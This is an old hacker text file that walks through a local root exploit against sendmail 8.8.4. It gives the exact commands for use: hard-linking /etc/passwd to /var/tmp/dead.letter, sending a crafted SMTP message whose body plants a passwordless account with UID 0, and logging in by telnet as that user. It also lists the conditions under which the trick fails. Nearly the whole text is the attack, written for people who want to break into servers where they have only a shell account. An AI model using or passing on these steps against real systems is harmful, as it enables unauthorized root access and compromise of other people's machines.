sendmail8.8.4 exploit "sendmail? 'tis the bugiest program" -phriend- Ok, here's a brief and interesting explonation of this famous exploit. This exploit uses sendmail version 8.8.4 and it requires that you have a shell acount on the server in question. The exploit creates a link from /etc/passwd to /var/tmp/dead.letter Very simple really. Here's how it works, below are the exact commands as you have to type them (for the technically challendged ones) * ln /etc/passwd /var/tmp/dead.letter * telnet target.host 25 * mail from: nonexsistent@not.an.actual.host.com * rcpt to: nonexsistent@not.as.actual.host.com * data * lord::0:0:leet shit:/root:/bin/bash * . * quit Kaboom, you're done, telnet to port 23 and log in as lord, no password required. Thanx to a little bit of work we did, lord just happens to have the same priviledges as root. There are a couple of reasons why this might not work. 1. /var and / are different partitions (as you already know, you can't make hard links between different partitions) 2. There is a postmaster account on a machine or mail alias, in which case, your mail will end up there instead of being written to a etc/passwd 3. /var/tmp doesn't exist or isn't publicly writable Duncan Silver www.hackersclub.com/uu